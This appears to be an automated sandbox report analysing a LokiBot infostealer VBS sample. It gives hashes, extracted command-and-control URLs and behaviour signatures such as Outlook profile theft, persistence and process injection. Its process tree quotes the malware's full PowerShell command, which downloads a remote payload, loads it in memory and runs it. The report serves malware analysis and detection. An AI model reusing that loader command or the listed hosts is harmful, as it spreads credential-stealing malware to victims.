Analysis
-
max time kernel
100s -
max time network
120s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2022 10:22
Static task
static1
Behavioral task
behavioral1
Sample
PD3007800123.vbs
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
PD3007800123.vbs
Resource
win10v2004-20220812-en
General
-
Target
PD3007800123.vbs
-
Size
219KB
-
MD5
d873de1b3b907887305e325426c407d5
-
SHA1
99c502d13b119a1b614f7384a3ba83fab10cd85d
-
SHA256
eedb863078dbdbd83a0d52d86dd779f27115360e17676e539602f4e1a8c9437c
-
SHA512
c4577d024fbbd2ea7b143d9780c7ca9f813f914c7d820151acfcc5ba7a92ebea832537a9847b5a7d203df6f00186be6d9bc5a26e515c705badeee985def3ffa1
-
SSDEEP
48:DVK0hbQvuivLvyvTxYvsvuiv7vu2vJR2vFvvvfv1KvFvDv2UfHvrvUvgYvc2vGgR:xKWdUIlVcWHfvGvXimF
Malware Config
Extracted
http://20.7.14.99/dll/dll_ink.pdf
Extracted
lokibot
http://iklok.us/li/UN/yours_me.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 4 1648 powershell.exe 10 1648 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegAsm.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1648 set thread context of 3608 1648 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 1648 powershell.exe 1648 powershell.exe 4136 powershell.exe 4136 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 1648 powershell.exe Token: SeDebugPrivilege 4136 powershell.exe Token: SeDebugPrivilege 3608 RegAsm.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 4716 wrote to memory of 1648 4716 WScript.exe powershell.exe PID 4716 wrote to memory of 1648 4716 WScript.exe powershell.exe PID 1648 wrote to memory of 4136 1648 powershell.exe powershell.exe PID 1648 wrote to memory of 4136 1648 powershell.exe powershell.exe PID 1648 wrote to memory of 3608 1648 powershell.exe RegAsm.exe PID 1648 wrote to memory of 3608 1648 powershell.exe RegAsm.exe PID 1648 wrote to memory of 3608 1648 powershell.exe RegAsm.exe PID 1648 wrote to memory of 3608 1648 powershell.exe RegAsm.exe PID 1648 wrote to memory of 3608 1648 powershell.exe RegAsm.exe PID 1648 wrote to memory of 3608 1648 powershell.exe RegAsm.exe PID 1648 wrote to memory of 3608 1648 powershell.exe RegAsm.exe PID 1648 wrote to memory of 3608 1648 powershell.exe RegAsm.exe PID 1648 wrote to memory of 3608 1648 powershell.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegAsm.exe -
outlook_win_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegAsm.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PD3007800123.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emit/swen/36.81.331.591//:ptth'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD59bc7f1b87a2c2bc9983a37920272f493
SHA11f4c28f4ddd202012474c28d857cae8f8f555ddf
SHA25613c488a6e5d81afee96b146445e7c2b153995b546bba9c6cbc4f5244eae843b1
SHA5129c0869d87ff9f71da92b73bbdcda5328a2633de6b8d32ed253f8fea52768bdacb6bebad49ec97006494da8cc5e9008453e5901de28e30d4b560e734d98f0f3c7
-
memory/1648-132-0x0000000000000000-mapping.dmp
-
memory/1648-133-0x000001FE6A300000-0x000001FE6A322000-memory.dmpFilesize
136KB
-
memory/1648-134-0x00007FFC1D440000-0x00007FFC1DF01000-memory.dmpFilesize
10.8MB
-
memory/1648-141-0x00007FFC1D440000-0x00007FFC1DF01000-memory.dmpFilesize
10.8MB
-
memory/3608-138-0x00000000004139DE-mapping.dmp
-
memory/3608-137-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/3608-143-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/3608-144-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/3608-145-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/4136-136-0x00007FFC1D440000-0x00007FFC1DF01000-memory.dmpFilesize
10.8MB
-
memory/4136-135-0x0000000000000000-mapping.dmp